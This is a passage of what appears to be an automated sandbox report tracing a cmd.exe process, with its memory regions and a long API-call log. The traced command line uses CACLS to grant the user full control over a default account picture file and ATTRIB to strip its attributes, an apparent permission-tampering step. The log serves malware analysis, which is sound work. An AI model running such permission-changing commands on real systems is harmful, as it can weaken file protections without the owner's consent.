%USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25303 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25304 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25305 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25306 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 25307 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25308 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25309 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25310 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 25311 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 25312 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25437 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25438 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25439 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25440 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 25441 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 25442 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25443 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25444 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25445 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename 
= "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25446 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25447 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25448 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25449 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25450 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25451 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 25452 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25453 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25454 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25455 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 25456 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 25457 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 25458 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 25459 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 25460 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 25464 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 468 os_tid = 0x46c [0181.445] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd34 | out: lpSystemTimeAsFileTime=0x1cfd34*(dwLowDateTime=0xa10d8700, dwHighDateTime=0x1d440a9)) [0181.445] GetCurrentProcessId () returned 0xcfc [0181.445] GetCurrentThreadId () returned 0x46c [0181.445] GetTickCount () returned 0x340b7 [0181.445] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd2c | out: lpPerformanceCount=0x1cfd2c*=23823404962) returned 1 [0181.446] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0181.446] __set_app_type (_Type=0x1) [0181.446] __p__fmode () returned 0x76b331f4 [0181.446] __p__commode () returned 0x76b331fc [0181.446] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0181.446] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, 
_Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0181.446] GetCurrentThreadId () returned 0x46c [0181.446] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x46c) returned 0x38 [0181.446] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0181.446] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0181.446] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.446] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0181.447] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfcc4 | out: phkResult=0x1cfcc4*=0x0) returned 0x2 [0181.447] VirtualQuery (in: lpAddress=0x1cfcfb, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0181.447] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0181.447] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0181.447] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0181.447] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc94, dwLength=0x1c | out: lpBuffer=0x1cfc94*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, 
Type=0x40000)) returned 0x1c [0181.447] GetConsoleOutputCP () returned 0x1b5 [0181.447] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.447] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0181.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.447] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0181.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.447] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0181.448] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.448] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0181.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.448] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0181.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.448] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0181.448] GetEnvironmentStringsW () returned 0x3b0308* [0181.448] FreeEnvironmentStringsW (penv=0x3b0308) returned 1 [0181.448] GetEnvironmentStringsW () returned 0x3b0308* [0181.449] FreeEnvironmentStringsW (penv=0x3b0308) returned 1 [0181.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec34 | out: phkResult=0x1cec34*=0x40) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0xb8, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x1, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec3c, 
lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x1, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x0, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x40, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x40, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x40, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegCloseKey (hKey=0x40) returned 0x0 [0181.449] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec34 | out: phkResult=0x1cec34*=0x40) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x40, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x1, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, 
lpData=0x1cec40*=0x1, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x0, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x9, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x9, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x9, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegCloseKey (hKey=0x40) returned 0x0 [0181.449] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638f [0181.450] srand (_Seed=0x5b88638f) [0181.450] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"" [0181.450] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"" [0181.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.450] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1a68, 
nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0181.450] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.450] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.450] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0181.450] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0181.450] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0181.450] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0181.450] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0181.451] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0181.451] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0181.451] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0181.451] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0181.451] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0181.451] GetEnvironmentStringsW () returned 0x3b2458* [0181.451] FreeEnvironmentStringsW (penv=0x3b2458) returned 1 [0181.451] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.451] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0181.451] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0181.451] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0181.451] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0181.451] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") 
returned 8 [0181.451] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0181.451] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0181.451] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0181.451] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0181.451] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfa00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.451] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfa00, lpFilePart=0x1cf9fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf9fc*="Desktop") returned 0x18 [0181.451] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0181.452] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf77c | out: lpFindFileData=0x1cf77c) returned 0x3b0ae8 [0181.452] FindClose (in: hFindFile=0x3b0ae8 | out: hFindFile=0x3b0ae8) returned 1 [0181.452] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf77c | out: lpFindFileData=0x1cf77c) returned 0x3b0ae8 [0181.452] FindClose (in: hFindFile=0x3b0ae8 | out: hFindFile=0x3b0ae8) returned 1 [0181.452] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf77c | out: lpFindFileData=0x1cf77c) returned 0x3b0ae8 [0181.452] FindClose (in: hFindFile=0x3b0ae8 | out: hFindFile=0x3b0ae8) returned 1 [0181.452] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0181.452] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0181.452] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0181.452] GetEnvironmentStringsW () returned 0x3b0308* [0181.453] FreeEnvironmentStringsW (penv=0x3b0308) returned 1 [0181.453] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.453] GetConsoleOutputCP () returned 0x1b5 [0181.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.453] GetUserDefaultLCID () returned 0x409 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfb40, cchData=128 | out: lpLCData="0") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfb40, cchData=128 | out: lpLCData="0") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfb40, cchData=128 | out: lpLCData="1") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0181.455] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0181.456] GetConsoleTitleW (in: lpConsoleTitle=0x3a09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0181.456] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0181.456] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0181.456] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0181.457] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0181.457] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0181.457] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0181.457] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0181.458] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0181.458] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0181.458] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0181.458] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0181.461] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0181.461] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0181.461] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0181.461] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0181.461] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0181.461] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0181.461] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0181.464] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.546] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0181.546] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0181.547] _wcsicmp (_String1="CACLS", 
_String2="DEL") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0181.547] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0181.547] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0181.547] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0181.547] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0181.547] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0181.547] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0181.547] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0181.547] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0181.547] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0181.547] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0181.547] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0181.547] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0181.547] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0181.547] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0181.547] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0181.547] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0181.547] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0181.547] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0181.547] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0181.547] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0181.547] _wcsicmp (_String1="CACLS", 
